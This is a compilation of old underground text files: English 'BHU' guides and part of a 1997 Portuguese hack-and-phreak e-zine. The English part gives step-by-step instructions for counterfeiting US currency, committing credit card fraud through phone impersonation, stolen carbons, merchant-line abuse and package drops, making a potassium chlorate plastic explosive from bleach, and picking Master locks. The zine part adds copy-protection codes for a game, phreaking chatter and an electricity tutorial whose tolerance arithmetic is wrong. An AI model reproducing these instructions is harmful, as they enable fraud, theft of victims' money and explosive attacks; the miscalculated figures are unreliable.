involves etching a metal block.  Since etching a metal block is
impossible to do by hand  photo offset printing comes into the
process.
 
Photo offset printing starts by making negatives of the currency
with a camera  and putting the negatives on a piece of masking
material (usually orange in color).  The stripped negatives
commonly called "flats"  are then exposed to a lithographic plate
with an arc light plate maker.  The burned plates are then
developed with the proper developing chemical.  One at a time
these plates are wrapped around the plate cylinder of the press.
 
The press to use should be an 11 by 14 offset  such as the AB Dick
360.  Make 2 negatives of the portrait side of the bill  and 1 of
the back side.  After developing them and letting them dry  take
them to a light table.  Using opaque on one of the portrait sides
touch out all the green  which is the seal and the serial numbers.
The back side does not require any retouching  because it is all
one color.  Now  make sure all of the negatives are registered
(lined up correctly) on the flats.  By the way  every time you
need another serial number  shoot 1 negative of the portrait side
cut out the serial number  and remove the old serial number from
the flat replacing it with the new one.
 
Now you have all 3 flats  and each represents a different color:
black  and 2 shades of green (the two shades of green are created
by mixing inks).  Now you are ready to burn the plates.  Take a
lithographic plate and etch three marks on it.  These marks must
be 2 and 9/16 inches apart  starting on one of the short edges.
Do the same thing to 2 more plates.  Then  take 1 of the flats and
place it on the plate  exactly lining the short edge up with the
edge of the plate.  Burn it  move it up to the next mark  and
cover up the exposed area you have already burned.  Burn that  and
do the same thing 2 more times  moving the flat up one more mark.
Do the same process with the other 2 flats (each on a separate
plate).  Develop all three plates.  You should now have 4 images
on each plate with an equal space between each bill.
 
The paper you will need will not match exactly  but it will do for
most situations.  The paper to use should have a 25% rag content.
By the way  Disaperf computer paper (invisible perforation) does
the job well.  Take the paper and load it into the press.  Be sure
to set the air  buckle  and paper thickness right.  Start with the
black plate (the plate without the serial numbers).  Wrap it
around the cylinder and load black ink in.  Make sure you run more
than you need because there will be a lot of rejects.  Then  while
that is printing  mix the inks for the serial numbers and the back
side.  You will need to add some white and maybe yellow to the
serial number ink.  You also need to add black to the back side.
Experiment until you get it right.  Now  clean the press and print
the other side.  You will now have a bill with no green seal or
serial numbers.  Print a few with one serial number  make another
and repeat.  Keep doing this until you have as many different
numbers as you want.  Then cut the bills to the exact size with a
paper cutter.  You should have printed a large amount of money by
now  but there is still one problem;  the paper is pure white.  To
dye it  mix the following in a pan:  2 cups of hot water  4 tea
bags  and about 16 to 20 drops of green food coloring (experiment
with this).  Dip one of the bills in and compare it to a genuine
US bill.  Make the necessary adjustments  and dye all the bills.
Also  it is a good idea to make them look used.  For example
wrinkle them  rub coffee grinds on them  etc.
 
As before mentioned  unless you are familiar with photo offset
printing  most of the information in this article will be fairly
hard to understand.  Along with getting a book on photo offset
printing  try to see the movie "To Live and Die in LA".  It is
about a counterfeiter  and the producer does a pretty good job of
showing how to counterfeit.  A good book on the subject is "The
Poor Man's James Bond".
 
If all of this seems too complicated to you  there is one other
method available for counterfeiting:  The Canon color laser
copier.  The Canon can replicate ANYTHING in vibrant color
including US currency.  But  once again  the main problem in
counterfeiting is the paper used.  So  experiment  and good luck!
                                             -BHU-
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Credit Card Fraud                brought to you by The BHU
 
For most of you out there  money is hard to come by.  Until now:
 
With the recent advent of plastic money (credit cards)  it is
easy to use someone else's credit card to order the items you have
always desired in life.  The stakes are high  but the payoff is
worth it.
 
Step One:  Getting the credit card information
 
First off  you must obtain the crucial item:  someone's credit
card number.  The best way to get credit card numbers is to take
the blue carbons used in a credit card transaction at your local
department store.  These can usually be found in the garbage can
next to the register  or for the more daring  in the garbage
dumpster behind the store.  But  due to the large amount of credit
card fraud  many stores have opted to use a carbonless transaction
sheet  making things much more difficult.  This is where your
phone comes in handy.
 
First  look up someone in the phone book  and obtain as much
information as possible about them.  Then  during business hours
call in a very convincing voice - "Hello  this is John Doe from
the Visa Credit Card Fraud Investigations Department.  We have
been informed that your credit card may have been used for
fraudulent purposes  so will you please read off the numbers
appearing on your Visa card for verification."  Of course  use
your imagination!  Believe it or not  many people will fall for
this ploy and give out their credit information.
 
Now  assuming that you have your victim's credit card number  you
should be able to decipher the information given.
 
Step Two:  Recognizing information from carbon copies
 
Card examples:
 
[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE
 
[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE
 
Explanation:
   MM/Y1 is the date the card was issued  and MM/Y2 is the
   expiration date.  The American Express Gold Card has numbers
   XXXXXX XXXXXXXX XXXXXXXX  and is covered for up to $5000.00
   even if the card holder is broke.
 
[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE
 
Explanation:
   XXXX in the second row may be asked for during the ordering
   process.  The first date is when the card was new  and the
   second is when the card expires.  The most frequent number
   combination used is 5424 1800 XXXX XXXX.  There are many of
   these cards in circulation  but many of these are on wanted
   lists  so check these first.
 
[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY    MM/YY*VISA
JOE SHMOE
 
Explanation:
   Visa is the most abundant card  and is accepted almost
   everywhere.  The "*VISA" is sometimes replaced with "BWG"  or
   followed with a special code.  These codes are as follows:
 
   [1]  MM/YY*VISA V - Preferred Card
   [2]  MM/YY*VISA CV - Classic Card
   [3]  MM/YY*VISA PV - Premier Card
 
   Preferred Cards are backed with money  and are much safer to
   use.  Classic Cards are newer  harder to reproduce cards with
   decent backing.  Premier Cards are Classic Cards with Preferred
   coverage.  Common numbers are 4448 020 XXX XXX  4254 5123 6000
   XXXX  and 4254 5123 8500 XXXX.  Any 4712 1250 XXXX XXXX cards
   are IBM Credit Union cards  and are risky to use  although
   they are usually covered for large purchases.
 
Step Three:  Testing credit
 
You should now have a Visa  Mastercard  or American Express
credit card number  with the victim's address  zip code  and phone
number.  By the way  if you have problems getting the address
most phone companies offer the Address Tracking Service  which is
a special number you call that will give you an address from a
phone number  at a nominal charge.  Now you need to check the
balance of credit on the credit card (to make sure you don't run
out of money)  and you must also make sure that the card isn't
stolen.  To do this you must obtain a phone number that
businesses use to check out credit cards during purchases.  If you
go to a department store  watch the cashier when someone makes a
credit card purchase.  He/she will usually call a phone number
give the credit information  and then give what is called a
"Merchant Number".  These numbers are usually written down on or
around the register.  It is easy to either find these numbers and
copy them  or to wait until they call one in.  Watch what they
dial and wait for the 8 digit (usually) merchant number.  Once you
call the number  in a calm voice  read off the account number
merchant number  amount  and expiration date.  The credit bureau
will tell you if it is ok  and will give you an authorization
number.  Pretend you are writing this number down  and repeat it
back to them to check it.  Ignore this number completely  for it
serves no real purpose.  However  once you do this  the bank
removes dollars equal to what you told them  because the card was
supposedly used to make a purchase.  Sometimes you can trick the
operator by telling her the customer changed his mind and decided
not to charge it.  Of course  some will not allow this.  Remember
at all times that you are supposed to be a store clerk calling to
check out the card for a purchase.  Act like you are talking with
a customer when he/she "cancels".
 
Step Four:  The drop
 
Once the cards are cleared  you must find a place to have the
package sent.  NEVER use a drop more than once.  The following are
typical drop sites:
 
   [1]  An empty house
 
An empty house makes an excellent place to send things.  Send the
package UPS  and leave a note on the door saying  "UPS.  I work
days  8 to 6.  Could you please leave the package on the back door
step?"  You can find dozens of houses from a real estate agent by
telling them you want to look around for a house.  Ask for a list
of twenty houses for sale  and tell them you will check out the
area.  Do so  until you find one that suits your needs.
 
   [2]  Rent A Spot
 
U-Haul sometimes rents spaces where you can have packages sent and
signed for.  End your space when the package arrives.
 
   [3]  People's houses
 
Find someone you do not know  and have the package sent there.
Call ahead saying that "I called the store and they sent the
package to the wrong address.  It was already sent  but can you
keep it there for me?"  This is a very reliable way if you keep
calm when talking to the people.
 
Do NOT try post office boxes.  Most of the time  UPS will not
deliver to a post office box  and many people have been caught in
the past attempting to use a post office box.  Also  when you have
determined a drop site  keep an eye on it for suspicious
characters and cars that have not been there before.
 
Step Five:  Making the transaction
 
You should now have a reliable credit card number with all the
necessary billing information  and a good drop site.
 
The best place to order from is catalogues  and mail order houses.
It is in your best interest to place the phone call from a pay
phone  especially if it is a 1-800 number.  Now  when you call
don't try to disguise your voice  thinking you will trick the
salesperson into believing you are an adult.  These folks are
trained to detect this  so your best bet is to order in your own
voice.  They will ask for the following:  name  name as it appears
on card  phone number  billing address  expiration date  method of
shipping  and product.  Ask if they offer UPS Red shipping (next
day arrival)  because it gives them less time to research an
order.  If you are using American Express  you might have a bit of
a problem shipping to an address other than the billing address.
Also  if the salesperson starts to ask questions  do NOT hang up.
Simply talk your way out of the situation  so you won't encourage
investigation on the order.
 
If everything goes right  you should have the product  free of
charge.  Insurance picks up the tab  and no one is any wiser.  Be
careful  and try not to order anything over $500.  In some states
UPS requires a signature for anything over $200  not to mention
that anything over $200 is defined as grand theft  as well as
credit fraud.  Get caught doing this  and you will bite it for a
couple of years.  Good luck!
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Making Plastic Explosives from Bleach           by The BHU
 
Potassium chlorate is an extremely volatile explosive compound
and has been used in the past as the main explosive filler in
grenades  land mines  and mortar rounds by such countries as
France and Germany.  Common household bleach contains a small
amount of potassium chlorate  which can be extracted by the
procedure that follows.
 
First off  you must obtain:
 
[1]  A heat source (hot plate  stove  etc.)
[2]  A hydrometer  or battery hydrometer
[3]  A large Pyrex  or enameled steel container (to weigh
     chemicals)
[4]  Potassium chloride (sold as a salt substitute at health and
     nutrition stores)
 
Take one gallon of bleach  place it in the container  and begin
heating it.  While this solution heats  weigh out 63 grams of
potassium chloride and add this to the bleach being heated.
Constantly check the solution being heated with the hydrometer
and boil until you get a reading of 1.3.  If using a battery
hydrometer  boil until you read a FULL charge.
 
Take the solution and allow it to cool in a refrigerator until it
is between room temperature and 0 degrees Celsius.  Filter out the
crystals that have formed and save them.  Boil this solution again
and cool as before.  Filter and save the crystals.
 
Take the crystals that have been saved  and mix them with
distilled water in the following proportions:  56 grams per 100
milliliters distilled water.  Heat this solution until it boils
and allow to cool.  Filter the solution and save the crystals that
form upon cooling.  This process of purification is called
"fractional crystallization".  These crystals should be relatively
pure potassium chlorate.
 
Powder these to the consistency of face powder  and heat gently to
drive off all moisture.
 
Now  melt five parts Vaseline with five parts wax.  Dissolve this
in white gasoline (camp stove gasoline)  and pour this liquid on
90 parts potassium chlorate (the powdered crystals from above)
into a plastic bowl.  Knead this liquid into the potassium
chlorate until intimately mixed.  Allow all gasoline to evaporate.
 
Finally  place this explosive into a cool  dry place.  Avoid
friction  sulfur  sulfides  and phosphorous compounds.  This
explosive is best molded to the desired shape and density of 1.3
grams in a cube and dipped in wax until water proof.  These block
type charges guarantee the highest detonation velocity.  Also  a
blasting cap of at least a 3 grade must be used.
 
The presence of the afore- mentioned compounds (sulfur  sulfides
etc.) results in mixtures that are or can become highly sensitive
and will possibly decompose explosively while in storage.  You
should never store homemade explosives  and you must use EXTREME
caution at all times while performing the processes in this
article.
 
You may obtain a catalog of other subject of this nature by
writing:
 
     Information Publishing Co.
     Box 10042
     Odessa  Texas  79762
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Picking Master Locks                            by The BHU
 
Have you ever tried to impress someone by picking one of those
Master combination locks and failed?
 
The Master lock company made their older combination locks with a
protection scheme.  If you pull the handle too hard  the knob will
not turn.  That was their biggest mistake.
 
The first number:
 
Get out any of the Master locks so you know what is going on.
While pulling on the clasp (part that springs open when you get
the combination right)  turn the knob to the left until it will
not move any more  and add five to the number you reach.  You now
have the first number of the combination.
 
The second number:
 
Spin the dial around a couple of times  then go to the first
number you got.  Turn the dial to the right  bypassing the first
number once.  When you have bypassed the first number  start
pulling on the clasp and turning the knob.  The knob will
eventually fall into the groove and lock.  While in the groove
pull the clasp and turn the knob.  If the knob is loose  go to the
next groove  if the knob is stiff  you have the second number of
the combination.
 
The third number:
 
After getting the second number  spin the dial  then enter the two
numbers.  Slowly spin the dial to the right  and at each number
pull on the clasp.  The lock will eventually open if you did the
process right.
 
This method of opening Master locks only works on older models.
Someone informed Master of their mistake  and they employed a new
mechanism that is foolproof (for now).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


December, 1997 - AmStErDaN - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                          VI - SEGURAN€A: WINDOWS 95
                          **************************


   Falar a palavra seguran‡a e depois a palavra Windows eh meio dificil, mas
agora eu vou ser obrigado a falar essa calurnia.
   Todos os sistemas da Microsoft tais como MS-DOS, Windows nao apresentam ne-
nhuma prote‡ao as informa‡oes armazenadas em um computador que roda um desses
SOz. Qualquer pessoa pode ler, apagar, e executar qualquer merda que esteja
em um computador.
   Eh claro que alguns programadores de desenvolvem sistemas em Windows e MS-
DOS geram seus proprios sistemas de seguran‡a, como um login e uma senha na
entrada de seus programas. Mas as vezes o login e a senha estao em um arquivo
senhas.txt no diretorio onde estao o resto dos arquivos do programa. Ou mesmo
se voce editar os arquivos com qualquer editor ASCII ou Hex, vc pode ler o que
tem lah. Sabendo dessas coisas a gente volta a falar a palavra seguran‡a.
   Vc dono de qualquer estabelecimento, que esteja lendo esse zine, todo feliz
por haver informatizado seu sistema de seilaoque, imagine seu sobrinho de 4
anos lendo todas as merdas que vc cadastra lah e depois dando um del *.*; ou
como o Bill Gates eh muito generoso, ele colocou um menu no Windows que com
um clique do mouse, qualquer lamer formata o HD. Digitando REGEDIT no direto-
rio \WINDOWS\SYSTEM; ele muda todos os registros de todos os programas e todo
o Hardware, ou melhor de tudo.
   Pois eh meu caro usuario de Windows 95, vc deve estar ai lendo pensando em
seus arquivos sendo bisbilhotados por aquele novo funcionario ai da outra sala
mexendo na poderosa rede do Windows 95. Ate na Internet vc nao estah seguro,
principalmente se vc usa a rede do Windows, sabia que qualquer um pode entrar
no seu micro por FTP apenas sabendo seu IP Address? Pois eh cuidado no IRC,
onde seu IP eh mostrado pra qualquer um. Com uma simples navegada na Internet
tem tanto olho gordo em cima de vc que eh incrivel, eh cookie pra ca, IP pra
lah e monitoramento de todos os lados. Cuidado com seu Sobrinho de 4 anos...

   Bom o que eu quis dizer com esse texto? Simples, eu desafio os programado-
res a tornar o MS-DOS e o Windows 95 seguros. Como? Fa‡a de tudo, explore o
potencial desse SO, tente gerar um tipo de arquivo que nao pode ser utiliza-
do por qualquer um sei lah, qualquer coisa. Ai perguntam... Mas por que dei-
xar ele mais seguro? Pra que os SOz usadoz pela maioria dos lamerz nos propo-
nahm um pequeno desafio a mais, e entao?


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                                VII -  WAREZ
                                ************

                        FRACA PROTE€AO DE COPYRIGHTS

   O que eu quero dizer com isso? Quero dizer q existem varios progz que sao
distribuidos livremente na categoria Shareware, mas que na verdade trazem o
seu programa completo, como eh o caso de muitos programas da MicroBost do Bill
Merda. Eh nao diga nunca que eh impossivel quebrar esses progz. Lembre-se, os
computadores funcionam com logica binaria, portando se alguem diz NAO, eh si-
nal de que existe um SIM. Nada eh impossivel.
   Bom e aih, nao vai ensinar nada? os lamerz jah estao perguntando...
   Nao nao vou, descubra por si como eu descobri de um joginho pra MS-DOZE.
   O jogo que estou falando eh o jogo DUNE, que copiei de um FTP de um prove-
dor Catarinense. O caminho do pro arquivo eh: ftp.netuno.com.br/pub
Lah vc encontrara o dune.zip, que deve ter uns 1.7 MB. Apos eu ter copiado o
arquivo, eu o descompactei e executei, depois veio uma imagem pedindo qual
pagina do manual tava a tal figura. Aih eu pensei: Que merda, pq os cara co-
locam um jogo completo com (prote‡ao) na entrada? Aih resolvi procurar uma
merda de arquivo com os numeros e nada. Entao eu executei o meu RAWCOPY e ti-
rei a prote‡ao, aih comecei a jogar, mas quando eu clicava sobre certas op‡oes
o jogo caia fora. Entao resolvi quebrar a coisa por mim mesmo, e depois de
tentar varias vezes o mesmo numero, decidi tentar um numero com um numero a
menos, e nao eh q o jogo entrou...
   Nao fiquei muito tempo tentando mas aih vao alguns q descobri:

   JOGO DUNE

   IMAGEM                                 NUMERO

   Dunas no Deserto                       06
   Gordao cor-de-rosa                     07
   Velho no corredor                      08
   Planeta Amarelo c/ seta azul           10
   Helicoptero na caverna                 19
   Logo Dune                              20


   Entao o bug do jogo foi um simples algoritmo que descobri por acaso, sempre
entrando com os mesmos numeros e depois diminuir um daquele numero e bingo...
   Creio q nao eh soh o jogo dune q tem esses problemas muitos outros jogos
desse tipo tbm tem. Eh soh tentar.


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±


                 VIII - PHREAKING: INTRODU€AO A ELETRICIDADE
                 *******************************************



   Para come‡ar a se aprofundar em phreak, vc precisa conhecer um pouco, ou
muito de eletronica. Pra come‡ar come‡arei falando de eletricidade, pois eh
fundamental na eletronica.


   ELETRICIDADE
   ============

   Bem o que seria a eletricidade? A eletricidade eh uma forma de energia,
que eh utilizada em quase tudo o que fazemos. Estes tais fenomenos eletricos
de nosso dia a dia pode ser classificado em quatro grandezas fundamentais ba-
sicas: a diferen‡a de potencial, a corrente, a potencia, e a resistencia.
   Come‡aremos a falar sobre a diferen‡a de potencial, ou voltagem.

   VOLTAGEM
   ========

   Bem as cargas eletricas como todos sabem podem ser representadas pelas par-
tes de um atomo:

   PROTON +
   NEUTRON 
   ELETRON -

   Essas cargas circulam pelos fios como se fossem carros trafegando em uma
rodovia movimentada. Estas cargas sao movimentadas por uma for‡a chamada for-
‡a eletromotriz. Essa for‡a esta presente nos chamados geradores, uma pilha
por exemplo. A for‡a eletromotriz movimenta as cargas nos condutores, com uma
diferen‡a de potencial relativa a resistencia jah presente no gerador. (fala-
rei sobre resistencia mais tarde). Como todas as grandezas eletricas, existe
uma unidade de medida existente para a diferen‡a de potencial muito conhecida
sua, chamada VOLT.

   VOLT=V

   Assim a diferen‡a de potencial da tomada da sua casa pode ser de 110 V ou
220 V.



   CORRENTE
   ========

   Como se fossem carros se movimentando, as cargas eletricas possuem uma cor-
rente. A intensidade com que as cargas passam sao chamadas de Coulomb, que eh
abreviado pela letra C. A corrente eletrica a calculada em Amperes, e eh abre-
viada pela letra A. Portanto, se passam 5 carros por segundo em uma estrada,
com velocidade de 80 km/h, em um fio passam 5 C por segundo com 80 A.
   Sempre lembre-se das abreviaturas das unidades de medida:

   V = Volt
   A = Ampere
   C = Coulomb


   POTENCIA
   ========

   Falando em potencia, jah dah pra saber do que se trata. A potencia daquela
corrente eletrica. A potencia eh medida em Watts, e eh abreviada pela letra
W.
   

   RESISTENCIA
   ===========

   Como o nome ja diz, a resistencia do condutor. Como se tivessem varios pos-
tes no meio de uma estrada movimentada. Entao quanto mais resistencia, menos
diferen‡a de potencial. Existe um componente eletronico chamado resistor, que
como qualquer corpo oferece resistencia. Por exemplo, a resistencia do chuvei-
ro. Como ela funciona? Eh o seguinte: as cargas eletricas passam pela resis-
tencia, que oferece "obstaculos" as cargas, sendo assim causando atrito, assim
fazendo a resistencia se aquecer esquentando a agua.
   Em eletronica, a resistencia a calculada em ohms. Le-se OMS. Vc deve notar
q em textos e esquemas de voltagem os ohms sao representados pelo algarismo
Grego "Omega". Eh mais ou menos isso:
                       
                       /---\        000       aaaa
                      |     |      0   0     a    a
                       \   /        0 0       a  a
                     ---   ---    000 000   aaa  aaa

   Agora sera preciso falar sobre os dois tipos de corrente: A corrente conti-
nua e a corrente alternada


   CORRENTE CONTINUA
   =================

   A corrente continua e assim chamada porque as cargas eletricas trafegam em
um soh sentido. Essa corrente vc pode ver em aparelhos eletronicos, abreviada
pela letra CC, ou DC. Como jah vimos, a corrente das cargas eletricas podem
ser calculadas em Amperes, mas como todas as unidades de medidas possuem sub-
multiplos: (isso vale para todas as medidas)

Miliampere:     1
               ---- A = 0,001 A = 1 mA
               1000


Microampere:   1
             ------- A = 0,000001 A = 1 uA
             1000000



   Bom, agora q vcs jah conhecem as grandezas fundamentais da eletricidade,
vamos aos componentes eletronicos q sao responsaveis por cada uma dessas gran-
dezas:


   RESISTOR
   ========

   O resistor eh um componente eletronico feito de materiais q apresentam
resistencia a eletricidade. Apesar de nao existir nenhum material q tenha re-
sistencia nula, os resistores sao feitos para alterar a tensao.
   Vc conhece muitos resistores, tais como o do chuveiro, vulgarmente conheci-
do como resistencia do chuveiro. A resistencia do chuveiro nao passa de um
bom resistor, q se aquece devido ao atrito das cargas eletricas em seu corpo,
aquecendo assim a agua.
   Para obter dados sobre os resistores, ou melhor sua resistencia em ohms,
vamos aprender agora como diferencia-los.

   Valor Nominal
   =-=-= =-=-=-=

   O valor nominal eh a resistencia do resistor em ohms. Este valor pode ser
encontrado no corpo do resistor atraves de um codigo de barras.

   Tolerancia
   =-=-=-=-=-

   Quando trabalhamos com valores, por exemplo, eu digo q um resistor tem va-
lor nominal de 200 ohms, na verdade, nao eh exatamente 200 ohms, pois se pe-
garmos um medidor de precisao, podemos nos deparar com 203, 201,8 ou algo
assim, por isso cada resistor tem uma tolerancia. A tolerancia eh medida pela
porcentagem, portanto se digo q meu resistor de 200 ohms tem tolerancia de 10%
entao:

      10% de 200  =   10  x 100 = 5, entao a tolerancia eh 5 ohms.
                     ----
                     200


   Entao calculamos: 200 + 5 = 205 \______ dizemos q o valor do resistor esta
                     200 - 5 = 195 /       entre 195 e 205 ohms.



   Aparencia Fisica
   =-=-=-=-= =-=-=-

   Bom, vc deve estar se perguntando: Mas como q eh um resistor? Eh muito sim-
ples, para ver melhor, veja a figura q veio junto com o arquivo zipado.
   

   Identifica‡ao
   =-=-=-=-=-=-=

   Para identifica um resistor eh utilizado um codigo, como eu jah havia dito 
acima. Vou ensinar o codigo americano, q eh usado aki no Brasil.


        Ú 1. algarismo
        ³ Ú 2. algarismo
        ³ ³ Ú multiplicador
        ³ ³ ³ Ú tolerancia
      ÚÄÂÄÂÄÂÄÂÄÄÄÄÄÄÄÄÄ¿
 ÄÄÄÄÄ´ ³ ³ ³ ³         ÃÄÄÄÄ
      ÀÄÁÄÁÄÁÄÁÄÄÄÄÄÄÄÄÄÙ   

   Vc pode notar q o resistor possui barras coloridas. Cada cor representa
um valor q pode ser lido com o auxilio da tabela abaixo:


   Cor      Algarismo   Multiplicador     Tolerancia

   PRETO       0                 x 1          1%
   MARROM      1                x 10          2%
   VERMELHO    2               x 100
   LARANJA     3              x 1000
   AMARELO     4             x 10000
   VERDE       5            x 100000
   AZUL        6           x 1000000
   ROXO        7          x 10000000
   CINZA       8         x 100000000
   BRANCO      9        x 1000000000
   DOURADO                     x 0.1          5%
   PRATEADO                   x 0.01         10%



   Entao fica facil, nao quer mais explicado q isso, ta no papo. Exemplo:

   Suponhamos q eu tenho um resistor com a primeira listra marrom, a segundo
preta, a terceira vermelha, e a quarta prateada, qual o valor nominal e a
tolerancia? Fazemos as contas:

   1. marrom = 1
   2. preto  = 0

   entao com as cores marrom e preto formamos o algarismo "10".

   3. Multiplicador: Vermelho: x 100

   10 x 100 = 1000

   Entao o valor nominal eh 1000 ohms, ou resumidamente 1K.

   Vejamos a quarta listra:

   4. Prata: Tolerancia: 10%

   Tolerancia de 10%

   Viu como eh simples?

   10% de 1000  =  10  x 100 = 1 ohm - 1000 + 1 = 1001 \ Entre 1001 e 999 ohms
                  ----                 1000 - 1 =  999 / 
                  1000

A continua‡ao na proxima edi‡ao...


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                            IX - CORREIO DA GALERA
                            **********************  

   Aki vao algumas cartas q eu recebi de pessoas q leem o e-zine, leiam e
guardem suas conclusoes pra si mesmo, nao venham me mandando mails dizendo:
"Aquele tal FuLaNo nao sabe nada, eh lammer..."
   Podem mandar comentarios, criticas, sugestoes, materias, tudo o q vc achar
q pode me ajudar, pode mandar. Bom, chega de papo-furado e vamos as cartas:


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

   Fala ai galera, eu sou o Rick Crazy, fa‡o o zine Quebra de Sigilo, que
   antes tinha terminado, mas agora come‡ei de novo.
   Eu li os seus dois zines, e achei bem legalzinho, e se eu fosse voces,
   fariam um zine apenas phreaker, coisa que nunca vi aqui no Brasil.
   Mas faria um negocio bem loco mesmo !!!!
   Bom, eu mano de hacking, e etc, e to loco pra come‡ar em Phreacker,
   logo, leio qualquer coisa que aparece, bom... ‚ isso ai, continuem assim
   galera !
   Alais, de onde voces sao ?

   Falo

   [RiCk> CraZy 


RESPOSTA: Que bom q o zine Quebra de Sigilo vai continuar. Um dos poucos con-
          sideravelmente "bom" do Brasil. Um exemplo de q nao ha rivalidade
          nenhuma entre a gente, isso eh bom. Quanto ao Phreak, isso eh soh
          no come‡o, q a partir dessa edi‡ao vai come‡ar a pintar mais mate-
          rias com Hacking, aguardem...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=-=-= ShK =-=-=

Olha... todos nos ja estamos cansados de ver essas zines "copiadas" umas
das outras. Mas, com isso, no meio desse monte de coisa igual, agente acaba
descobrindo coisas novas. Eu estava afim de te ajudar, mas para isso seria
necessario remodelar a zine completamente. Nao vamos fazer coias para gente
burrinha ou lamers metidos a besta. Nada de de explicar como se abre um
telefone, como funciona tcp/ip ou como se faz um virus. Isso eh coisa de
lamer!

Temos q acabar com esse pessoal q aprende 1 truque e fica tirando onda de
hacker... um cara q nem sabe programar ou montar um micro... essas coisas...
um viadinho qualquer q tem pentium 200mmx e roda o ruindows 95. Esse tipo de
pessoa tem q morrer, se agente libera informacao pra um cara desses, oq
acontece?

Pra inicio de conversa, temos q estudar mais a area de telefonia, eu ja
trabalhei na tele?? como estagiario e conheco alguma coisa, posso facilmente
escrever alguma coisa sobre isso. Conheco bastante a area de bbs. Desde bbs
comum ate sistemas fechados em forma de bbs (esses q sao legais de se
hackear!).

bom.. vou parando por aqui se me quiser como companheiro, eh so entrar
em contato comigo. Pode mandar um reply.
Eu nao sei qual desses eu vou usar pq o da geocities ta dando merda e eu
to usando uma conta que eu arrumei ai de gratis com um lamah. Por isso to sem
mail.

[]

=-=-= ShK =-=-=

RESPOSTA: Vc eh muito realista mesmo, o meu zine nao eh o melhor, e nem sei
          se tem chances de ser, quanto a sua preocupa‡ao em soltar informa-
          ‡oes aos lammers, como vc pode notar, a partir desta edi‡ao, nao
          vou fazer coisas do tipo: vc pega aki e poe ali, vou falar: pratique
          e eh bem isso q os lammahs nao tem vontade de fazer. Mesmo assim,
          ninguem aprende a ser alguma coisa apenas lendo e-zines, tem que
          correr atras. Pois o meu objetivo nao eh formar hackers, se eu qui-
          zesse isso abriria uma faculdade de ciencias hackeologicas, e cobra-
          ria uma facada por mes. Isso aki eh de gra‡a, nao ganho nada pra
          fazer o q estou fazendo, e nem dedico o meu tempo todo no zine, tal-
          vez seja por isso q ele nao tenha uma qualidade elevada. Mas eu fa‡o
          o q posso...


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

   Sera que dava para enviar algumas dicas de Phreak e Anarchy ? 
   Eu tenho muitos programas e dicas sobre hackers aqui. tenho tambem 
   muitos textos bons aqui tambem. 

   Tank you

   Cyber Cool

RESPOSTA: Em todas as edi‡oes tem varias dicas de Phreak e Anarchy, sempre
          verifique a atualiza‡ao da HomePage para novas dicas.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

pArAbEnS ,sE tIvEr a ChAnCe vIsitE a MiNhA hp at 
   www.geocities.com/eureka/park/9695 

RESPOSTA: Claro!!!  :)    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mandrack, 

   Parabens pelo excelente zine, que tem me ajudado bastante. 
   Tive sucesso , em conectar aparelhos a orelhoes , e "Diodar" os 
   aparelhos , mas naum consegui fazer funcionar nenhuma das tecnicas de 
   "infinita‡ao" de cartoes , sera que poderia me enviar informa‡oes mais 
   detalhadas sobre aquela do cartao vazio ? O que vc define como "parte de 
   tras "? o desenho ou a parte cinza? 
   Tambem consegui fazer uma busy box , na casa de um lamer , alem 
   de conectar meu notebook(to te escrevendo de um orelha , e ontem me 
   conectei a um armario...) . 
   Seu zine tem sido muito util, qualquer coisa que eu possa fazer 
   p/ ajudar... Me avise! 

   Valeu, 


   AnubiS KnigHT 

RESPOSTA: Poxa, eh bom saber q vc aprendeu devido ao zine. A melhor forma de
          ajudar eh distribuindo, e colocando links para minha HP.
          Quanto a tecnica de cartoes, eu peguei aquelas coisas de outros
          textos, sem testa-los, mas depois do teste, vi q nao passa de
          besteira, agora comecei a estudar os cartoes melhor, quando desco-
          brir algo, eu publico no e-zine. Uma das unicas q funciona eh a de
          um "BUG" q existe em certos orelhoes a cartao q segurando o 0 (zero)
